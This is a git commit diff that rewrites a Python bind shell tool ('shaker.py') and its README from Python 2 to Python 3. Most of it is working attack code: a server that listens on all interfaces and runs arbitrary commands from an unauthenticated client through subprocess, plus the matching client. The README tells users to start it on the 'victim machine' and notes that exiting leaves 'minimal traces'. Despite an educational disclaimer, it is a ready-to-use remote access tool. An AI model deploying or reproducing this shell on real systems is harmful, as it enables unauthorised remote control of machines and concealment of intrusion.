New bind shell in python3

Manmeet Singh · Manmeet Singh · commit d51cce8cccce · 2025-06-12T00:11:46.000+05:30
diff --git a/README.md b/README.md
@@ -1,24 +1,64 @@
-# bind-shell-python
-This is a basic bind shell script in python 2 , containing both server and client classes. This bind shell can work on both Windows and Linux OS.
+# Bind Shell in Python 3
 
-## Server Mode
+A simple and educational Python 3-based bind shell script that supports both **server** and **client** modes. Compatible with both **Linux** and **Windows** systems.
 
-Server mode of script should be started at victim machine by executing bellow commands in terminal of victim machine:<br />
-  `python shaker.py server [port to bind]` <br />
-This will open specified port and listen for incoming shell commands from a user running this script in Client mode.
+> ⚠️ **Disclaimer:** This tool is for **educational purposes only**. Unauthorized use on systems you do not own or have explicit permission to test may be illegal.
 
-## Client Mode
+---
 
-Client mode od script should be used to communicate with victim machine running this script in server mode , inshort, we can run this script in client mode to communicate with device running this bind shell in server mode.<br />
-Two things we should know before running this script in client mode are :<br />
-1. IP of victim machine.
-2. Port on which this bind shell is running.<br />
-Run bellow terminal command to start client mode :<br />
-  `python shaker.py client [port on which bind shell is running] [IP of victim machine]`<br />
-This will connect with the victim machine
+## Features
 
-## Stoping Server Mode From Client Side
+- ✅ Python 3 compatible
+- ✅ Works on Windows and Linux
+- ✅ Simple and readable structure
+- ✅ Clean shutdown support with `exit` command
+- ✅ Sends current directory with every response
 
-Now we have the shell and want to shut the bind shell running on victim machine, then we just have to type "exit" on running shell at client side . It will stop the script on victim side and port will go free. So there will be no traces that somebody bind the port. Many a time people don't know how to shut the bind port off , this script will do this for you. <br />
+---
+
+## Usage
+
+### Server Mode
+
+Start the server on the target/victim machine:
+
+```
+python3 shaker.py server [port]
+```
+* Listens on all interfaces (0.0.0.0) for incoming connections.
+* Executes commands sent from the client and returns output.
+
+###Client Mode
+Start the client to control the remote machine:
+```
+python3 shaker.py client [port] [server_ip]
+
+```
+**You need**:
+
+* IP address of the machine running the server.
+* Port on which the server is listening.
+
+Once connected:
+
+* You will get a shell prompt.
+* Type shell commands and receive output.
+* Type `exit` to shut down the server and end the session.
+
+### Shutting Down the Server
+
+To stop the bind shell cleanly:
+
+* From the client session, type:
+`exit`
+- This will:
+  - Terminate the server process.
+  - Release the bound port.
+  - Leave minimal traces.
+
+## Contact
+
+Have questions or suggestions? Reach out to @_j0lt on Twitter.
+
+© This script is meant for ethical hacking and learning. Always get proper authorization.
 
-If any issues or comments connect with me at twitter @_j0lt 
diff --git a/shaker.py b/shaker.py
@@ -1,134 +1,115 @@
-# Require python2 
-# Bind shell by j0lt
-# This script is just for giving reference that how bind shell look like in python, you can modify as per your need.
-# Usage Format :
-#   For Running Server : shaker.py server [port]
-#   For Running client : shaker.py client [port] [ip of server]
-
 import socket
-from sys import argv
-from os import _exit
+import sys
 import json
-from zlib import compress,decompress
-from platform import system
-
-
-class server:
+import zlib
+import platform
+import subprocess
 
-    def __init__(self,port):
-        self.ip = '0.0.0.0'
+class BindShellServer:
+    def __init__(self, port):
+        self.host = '0.0.0.0'
         self.port = port
-        self.l = "cd"
-        self.o = system()
-        if self.o == "Linux" or self.o == "SunOS":
-            self.l = "pwd"
+        self.init_cmd = 'pwd' if platform.system() in ['Linux', 'SunOS'] else 'cd'
 
     def start(self):
         try:
-            so = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
-            so.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
-            so.bind((self.ip,self.port))
-        except socket.error:
-            print "There is some error with address...\t The Server could not be started"
-            _exit(1)
-        try:
-            so.listen(1)
-            host = socket.gethostbyname(socket.gethostname())
-            print "[%s:%s] Waiting for connection ..."%(host,self.port)
-
+            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server_socket:
+                server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+                server_socket.bind((self.host, self.port))
+                server_socket.listen(1)
+                print(f"[{socket.gethostbyname(socket.gethostname())}:{self.port}] Waiting for connection...")
+
+                conn, addr = server_socket.accept()
+                with conn:
+                    print(f"Connected with {addr[0]}")
+                    welcome_msg = {
+                        "msg": f"Connected with {platform.system()} at {socket.gethostbyname(socket.gethostname())}",
+                        "location": self.run_cmd(self.init_cmd)[1]
+                    }
+                    conn.sendall(zlib.compress(json.dumps(welcome_msg).encode()))
+
+                    while True:
+                        try:
+                            command = conn.recv(2048)
+                            if not command:
+                                break
+                            command = command.decode().strip()
+                            if command.lower() == 'exit':
+                                break
+                            output, location = self.run_cmd(command)
+                            response = {"output": output, "location": location}
+                            conn.sendall(zlib.compress(json.dumps(response).encode()))
+                        except Exception as e:
+                            print(f"Connection error: {e}")
+                            break
 
-            while 1:
-
-                ob , address = so.accept()
-                print "Connected with %s "%address[0]
-                ob.send(compress(json.dumps({"msg":"Connected With %s os at %s"%(self.o,host) , "location":self.__cmd(self.l)[1]}).encode()))
-                while 1:
-                    try:
-                        command = ob.recv(2048)
-                        assert(command != "exit")
-                        reply = self.__cmd(command)
-                        data = json.dumps({"output":reply[0], "location":reply[1]})
-                        ob.send(compress(data.encode()))
-                    except socket.error:
-                        print "Connection Ended..\n Reconnecting..."
-                        break
-                    except (KeyboardInterrupt,AssertionError):
-                        print "Stoping server .."
-                        ob.send("Server Stopped..")
-                        ob.close()
-                        so.close()
-                        _exit(1)
-
-        except socket.error:
-            print "Connection problem .."
-            so.close()
-            _exit(1)
         except KeyboardInterrupt:
-            print "Stoping server .."
-            so.close()
-            _exit(1)
+            print("Server interrupted by user.")
+        except Exception as e:
+            print(f"Server error: {e}")
 
-    def __cmd(self,command):
-        from os import popen
+    def run_cmd(self, command):
         try:
-            q = popen(self.l).read()
-            o = popen(command).read()
-
-            return (o,q)
-        except:
-            return "Sorry!! Command not executed"
-
-class client:
-
-    def __init__(self,ip, port):
+            location = subprocess.getoutput(self.init_cmd)
+            output = subprocess.getoutput(command)
+            return output, location
+        except Exception as e:
+            return f"Command failed: {e}", ""
+
+class BindShellClient:
+    def __init__(self, ip, port):
         self.ip = ip
         self.port = port
 
     def start(self):
-            so = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
-            while 1:
-                try:
-                    so.connect((self.ip,self.port))
-                    data = json.loads(decompress(so.recv(2048)).decode())
-                    print data.get('msg')
-                except socket.error:
-                    print "Connection Error ... or Server is down"
-                    if raw_input("Try Reconnect[Y/n]").lower() == 'n':
-                        _exit(1)
-                    else:
-                        continue
-
-                while 1:
-                    try:
-
-                        a = raw_input('%s>'%data.get('location').replace('\n',''))
-                        so.sendall(a)
-                        assert(a.lower() != 'exit')
-                        data = json.loads(decompress(so.recv(2048)).decode())
-                        print data.get('output')
-                    except (socket.error,AssertionError) :
-                        print "Server Disconnected"
-                        so.close()
-                        _exit(1)
-
-if __name__ == "__main__":
-
-    try:
-        assert(argv[1].lower() in ["client", "server"])
-        assert (int(argv[2]) in range(1, 65535))
-
-        port = int(argv[2])
-        if argv[1].lower() == "client":
-            ip = argv[3]
-            assert (socket.inet_aton(argv[2]))
-            s = client(ip, port)
-            s.start()
-
-        else:
-            s = server(port)
-            s.start()
-
-    except:
-        print "The Parameter provided are wrong \n\n\tUsage Format : shaker.py [client/server] [port] [ip{just for client}]"
-        _exit(1)
+        while True:
+            try:
+                with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client_socket:
+                    client_socket.connect((self.ip, self.port))
+                    data = json.loads(zlib.decompress(client_socket.recv(2048)).decode())
+                    print(data.get("msg"))
+
+                    while True:
+                        try:
+                            command = input(f"{data.get('location').strip()}> ")
+                            if command.lower() == 'exit':
+                                client_socket.sendall(command.encode())
+                                print("Exiting client.")
+                                return
+                            client_socket.sendall(command.encode())
+                            response = json.loads(zlib.decompress(client_socket.recv(2048)).decode())
+                            print(response.get("output"))
+                            data = response
+                        except Exception as e:
+                            print(f"Server disconnected: {e}")
+                            return
+            except (ConnectionRefusedError, socket.error):
+                print("Connection failed. Server may be down.")
+                retry = input("Try reconnect? [Y/n]: ").strip().lower()
+                if retry == 'n':
+                    break
+
+def main():
+    if len(sys.argv) < 3:
+        print("Usage: python3 shaker.py [client/server] [port] [ip (client only)]")
+        sys.exit(1)
+
+    role = sys.argv[1].lower()
+    port = int(sys.argv[2])
+
+    if role == 'server':
+        server = BindShellServer(port)
+        server.start()
+    elif role == 'client':
+        if len(sys.argv) != 4:
+            print("Client mode requires IP address.")
+            sys.exit(1)
+        ip = sys.argv[3]
+        client = BindShellClient(ip, port)
+        client.start()
+    else:
+        print("Invalid role. Choose 'client' or 'server'.")
+
+if __name__ == '__main__':
+    main()
 
